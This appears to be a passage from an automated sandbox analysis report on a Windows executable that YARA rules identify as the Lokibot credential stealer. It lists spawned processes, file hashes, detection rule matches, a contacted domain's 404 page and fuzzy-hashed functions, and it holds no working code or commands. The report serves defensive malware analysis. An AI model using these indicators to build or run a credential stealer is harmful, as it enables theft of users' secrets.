74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 65 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 — Page Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="404 - Page Not Found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:375px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:375px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><bo
Apr 18, 2024 23:01:59.179420948 CEST	403	IN	Data Raw: 64 79 3e 0a 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 2f 22 3e 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 3c 2f 61 3e 3c 2f 70 3e 0a 20 Data Ascii: dy> <p><a href="http://tequilacofradiamx.com/">tequilacofradiamx.com</a></p> <h1>404</h1> <h2>Page Not Found</h2> <div> The page you were trying to reach does not exist. Or, maybe it has moved. You can start aga

Target ID:	0
Start time:	23:01:53
Start date:	18/04/2024
Path:	C:\Users\user\Desktop\lqoUUYTMsL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lqoUUYTMsL.exe"
Imagebase:	0xd70000
File size:	369'664 bytes
MD5 hash:	3113C2A7B30C1CB350E8950B4222B0C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	23:01:54
Start date:	18/04/2024
Path:	C:\Users\user\Desktop\lqoUUYTMsL.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\lqoUUYTMsL.exe
Imagebase:	0x9d0000
File size:	369'664 bytes
MD5 hash:	3113C2A7B30C1CB350E8950B4222B0C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.1680125185.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:01:54
Start date:	18/04/2024
Path:	C:\Users\user\Desktop\lqoUUYTMsL.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\lqoUUYTMsL.exe
Imagebase:	0xa20000
File size:	369'664 bytes
MD5 hash:	3113C2A7B30C1CB350E8950B4222B0C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	23:01:54
Start date:	18/04/2024
Path:	C:\Users\user\Desktop\lqoUUYTMsL.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\lqoUUYTMsL.exe
Imagebase:	0xee0000
File size:	369'664 bytes
MD5 hash:	3113C2A7B30C1CB350E8950B4222B0C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	23:01:54
Start date:	18/04/2024
Path:	C:\Users\user\Desktop\lqoUUYTMsL.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\lqoUUYTMsL.exe
Imagebase:	0x8b0000
File size:	369'664 bytes
MD5 hash:	3113C2A7B30C1CB350E8950B4222B0C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	19.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	12.8%
Total number of Nodes:	47
Total number of Limit Nodes:	3

Executed Functions

Function 018B7DD0 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

T4c, xrefs: 018B80C4
\O'l, xrefs: 018B808E
\O'l, xrefs: 018B8083
T4c, xrefs: 018B80DB
\O'l, xrefs: 018B80AB

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID: T4c$T4c$\O'l$\O'l$\O'l
API String ID: 0-1240238097
Opcode ID: 352c54deb42ca4c969d5682a35a6e15fc2f105e9711cc30bb4756202c19d883d
Instruction ID: 0155a37d9910b33a4752cf5ff33886c4315f379d66c70b9d6cdae4329577fcce
Opcode Fuzzy Hash: 352c54deb42ca4c969d5682a35a6e15fc2f105e9711cc30bb4756202c19d883d
Instruction Fuzzy Hash: 34124474E04208DFDB14CFA9D5849ADBBF2FF89304B2480A9D415AB395DB35AA42CF64

Uniqueness

Uniqueness Score: -1.00%

Function 018B7E10 Relevance: 6.5, Strings: 5, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

T4c, xrefs: 018B80C4
\O'l, xrefs: 018B808E
\O'l, xrefs: 018B8083
T4c, xrefs: 018B80DB
\O'l, xrefs: 018B80AB

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID: T4c$T4c$\O'l$\O'l$\O'l
API String ID: 0-1240238097
Opcode ID: 9006400c40027a50007c655e8870543b08fc1a162241886f76bd6bea0c260bdb
Instruction ID: d80c510abdf457a6c057c44f955a5b3cd4b9daed7f5fffefcbe2760b1094a323
Opcode Fuzzy Hash: 9006400c40027a50007c655e8870543b08fc1a162241886f76bd6bea0c260bdb
Instruction Fuzzy Hash: 5691CF74E00218DFDB14DFA9D988AEDBBF2BF89301F148069E819AB754DB319945CF21

Uniqueness

Uniqueness Score: -1.00%

Function 018B8DDC Relevance: 3.9, Strings: 3, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

b, xrefs: 018B8F5D
2'l, xrefs: 018B8E22
2'l, xrefs: 018B8E95

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID: b$2'l$2'l
API String ID: 0-3887907858
Opcode ID: 03dd0f03deb433785969330e79f0a62dafa47a835d29c70606f24709dae2b9fd
Instruction ID: b552567f7d0687dc841b7017ec70dbdea185e0076ce60670bb83aecd62027335
Opcode Fuzzy Hash: 03dd0f03deb433785969330e79f0a62dafa47a835d29c70606f24709dae2b9fd
Instruction Fuzzy Hash: DD514270D0620ACFDB05CFA4C5856EEBBB6BF4A314F18986AD002BB750D7348A45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 018B8DF8 Relevance: 3.9, Strings: 3, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

b, xrefs: 018B8F5D
2'l, xrefs: 018B8E22
2'l, xrefs: 018B8E95

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID: b$2'l$2'l
API String ID: 0-3887907858
Opcode ID: 0da02e1ad2dbd9931a966b1b75414e6dfaf323f3a73cd4f76d826880a7e42886
Instruction ID: 5dcc83fbdee2e1ef31e319894de7982ae0c0325ef43ba69c8a4b261daf05822e
Opcode Fuzzy Hash: 0da02e1ad2dbd9931a966b1b75414e6dfaf323f3a73cd4f76d826880a7e42886
Instruction Fuzzy Hash: 5D513270D0521ACFDB04DFA5C5846EEBBB6BF4A318F14982AD102BB340D7349A44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 018B4A0B Relevance: 2.8, Strings: 2, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

z:P, xrefs: 018B4C69
FFb, xrefs: 018B4D1D

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID: FFb$z:P
API String ID: 0-1799881367
Opcode ID: 2e9fd5aa3a514f4de86d7b334c31198142a6e61780ef6a77a45960f415fb7511
Instruction ID: 8f55073b9f7fd092f846735a3145341931688375139e98c8a17325d23185de53
Opcode Fuzzy Hash: 2e9fd5aa3a514f4de86d7b334c31198142a6e61780ef6a77a45960f415fb7511
Instruction Fuzzy Hash: 4EC1497090520ADFCB04CFA8D6858EEFBB1FF49315B24A559D402AB316D734AB81CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 018B4A40 Relevance: 2.8, Strings: 2, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

z:P, xrefs: 018B4C69
FFb, xrefs: 018B4D1D

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID: FFb$z:P
API String ID: 0-1799881367
Opcode ID: 2586d1bfd19fd894fcc6fe6aadab935407a5e916e00d0543d9d1293372c5174d
Instruction ID: 00daae958af23d8ca56a6e2828792a184db9a6fe0274ef14fc59925e1bc19b71
Opcode Fuzzy Hash: 2586d1bfd19fd894fcc6fe6aadab935407a5e916e00d0543d9d1293372c5174d
Instruction Fuzzy Hash: 0CC1047090520ADFCB04CFA8D6858EEFBB5FF48315B24A559D402AB316D734AB81CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 012DA97F Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 012DA9FF

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 96c03fb66df7dbd06844dd8bbc3120562f9e221fc34d3753ee3384a4de12be0e
Instruction ID: 8a26dad37bb287e0a9ef53418b3e3452fd6ba09d21066bb2ba30c9a3196b916d
Opcode Fuzzy Hash: 96c03fb66df7dbd06844dd8bbc3120562f9e221fc34d3753ee3384a4de12be0e
Instruction Fuzzy Hash: 73219F755097809FEB238F25DC44F52BFB4EF06210F0985DAE9858B563D2719908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 012DA9B6 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 012DA9FF

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 4338bab725806c00f0bdd52d29f5ad364eeae14013e3dff2a599810528aa7ed7
Instruction ID: 26badefb1916e7460c253e06cfa789e9f5675570bc7d7e75d36604a0e9034ded
Opcode Fuzzy Hash: 4338bab725806c00f0bdd52d29f5ad364eeae14013e3dff2a599810528aa7ed7
Instruction Fuzzy Hash: CC11C2756002009FEB21CF55D945F66FBE4EF08220F08C9AAEE858B652D371E408DF62

Uniqueness

Uniqueness Score: -1.00%

Function 056A6F30 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

pV, xrefs: 056A721B

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID: pV
API String ID: 0-2768523175
Opcode ID: 34ec2e3c71f914c97b6024b5c492b82167f5ca659a4630c0610ac17aad069e37
Instruction ID: a79fc3da95add93c1ae4230549d373a8fa9f01f32c4a0a8c573dfc58d1f723cf
Opcode Fuzzy Hash: 34ec2e3c71f914c97b6024b5c492b82167f5ca659a4630c0610ac17aad069e37
Instruction Fuzzy Hash: 64C13776D0520ADFCB04CFA4C6848AEFBB2FF49354B249559D502BB354D730AA82CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 056A6101 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

_qjf, xrefs: 056A6486

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID: _qjf
API String ID: 0-3705308623
Opcode ID: aae7549daaa2ed5ea4a150c583296350f6b202a66159e3017fbf517e91e82d4e
Instruction ID: 1d1de1a8661c27678baf9fec20d943286e2998b53f6b30b2e923490e3b0d8d26
Opcode Fuzzy Hash: aae7549daaa2ed5ea4a150c583296350f6b202a66159e3017fbf517e91e82d4e
Instruction Fuzzy Hash: CE3118B1D016188BDB18CFA6D9446DEBBF2EFC9310F14C06AD409AA224D7755A46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 056A330F Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7004a1805f6ca3f74cf6a8c5927259744ea4f5cfc50e9e8f76b8ae153bc7fde1
Instruction ID: d9efa5f961f89e1dbb58541c179883ae6b356725fe72e68cc0be3449c51ef598
Opcode Fuzzy Hash: 7004a1805f6ca3f74cf6a8c5927259744ea4f5cfc50e9e8f76b8ae153bc7fde1
Instruction Fuzzy Hash: 7AE1C276E40B459BD700CF658C46B9AFBB1BF45702F0AC2A5E608AF2D2D7708981CF41

Uniqueness

Uniqueness Score: -1.00%

Function 056A4F81 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4b366ae667866556902ee5364738fc345676f1a01d10161ac439d4c88a46cc1
Instruction ID: 311daad74691b5e464f3a18bb703f68d652b2dc6b51d828395bf626f2c764098
Opcode Fuzzy Hash: e4b366ae667866556902ee5364738fc345676f1a01d10161ac439d4c88a46cc1
Instruction Fuzzy Hash: 7AB16B75E04609EFDB04CFA5C885AAEBBB2FF98301F10806AD506AB394D7709A41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 018BB2A0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2b5125d5544a2e18cb2621f62e3daffff55455f81f3b4f7ab168a437f6ea302
Instruction ID: b91e2d43e4066ce461af63f36a0210dd3f48bebf0f91f82ce6b71ba14c14bda4
Opcode Fuzzy Hash: a2b5125d5544a2e18cb2621f62e3daffff55455f81f3b4f7ab168a437f6ea302
Instruction Fuzzy Hash: 97C1227090620ADFCB04CFA4D6848EEBBF1FF49314B669559D806AB314D734AB81CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 018B2989 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 598078a521e353631dadbf5a7b8f6f96bc9c02cc3cd688c0b2d7e296268e5373
Instruction ID: 9e780a79813b55fa752f5d2d5a733dec9982252a7938b9600830c504f4b846f3
Opcode Fuzzy Hash: 598078a521e353631dadbf5a7b8f6f96bc9c02cc3cd688c0b2d7e296268e5373
Instruction Fuzzy Hash: 76B1F075E05209DFDB04CFA9C585AEEBBF2FF89304F24806AD405AB314DB34AA41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 056A349A Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f12d5204eb05b3aef6704e49b781602f185ddfce5c1d90ce27da551c5ddd5e2
Instruction ID: fcb4530e78df0313e6c31e0691cd2270eb6aa7625009185fd6c34fc930f79a42
Opcode Fuzzy Hash: 0f12d5204eb05b3aef6704e49b781602f185ddfce5c1d90ce27da551c5ddd5e2
Instruction Fuzzy Hash: A2918C75E406589BDB04CFA6CC45BDABBF2BF89301F05C5A9E508AB391E7709A81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 056A34E2 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d096cdc46ae7c14b7dd390d021ed24c6c24e349d592926b72bcad6ba40aa5982
Instruction ID: 2bd33bb77c3ad377685ea0593be44d3b00e3bdc0a15cc913f3fa41a5850454bc
Opcode Fuzzy Hash: d096cdc46ae7c14b7dd390d021ed24c6c24e349d592926b72bcad6ba40aa5982
Instruction Fuzzy Hash: 29915B75E006589BDB14CF6ACC45BDABBF2BF89301F05C1A9E508AB391DB749A81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 018B29F8 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b1b2acfad35223f835b290fb121ddbfe263361302e82db6cc7e72b8824eee28
Instruction ID: b5ca8efaefd7129e4f3bb77a942f0913f1b952389a0ed47b1b8d0ebc81552846
Opcode Fuzzy Hash: 7b1b2acfad35223f835b290fb121ddbfe263361302e82db6cc7e72b8824eee28
Instruction Fuzzy Hash: F991B0B5E15209DFDB14CFA9C584AEEBBF2FF89304F20906AD405AB354DB34AA41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 056A5018 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9199a37018cd164df3c02c40bf64f1ef61645bbf0fc5b1564c72a5377c70e44
Instruction ID: 7dafe8815f61958cdc758c7997b692f3f97a929a2f40593f2a154fd1fd8fee72
Opcode Fuzzy Hash: b9199a37018cd164df3c02c40bf64f1ef61645bbf0fc5b1564c72a5377c70e44
Instruction Fuzzy Hash: 1691C375E05209DFDB04CFE5C5859AEBBB2FF99304F20806AD406AB354D7359A42CF91

Uniqueness

Uniqueness Score: -1.00%

Function 018B9018 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73ecf34dee2d9f8df0c4fad861964e45a80b7283cae8fddac0b69398f3f65414
Instruction ID: 7a77c354cdbbbf83059ecc4f981c802688ba7b8d4a2dfbb062721553f59109c8
Opcode Fuzzy Hash: 73ecf34dee2d9f8df0c4fad861964e45a80b7283cae8fddac0b69398f3f65414
Instruction Fuzzy Hash: 9F91CDB4E05209DFDB04DFA9D5849EEBBF2FF89304F20846AD516AB314D7349A42CB91

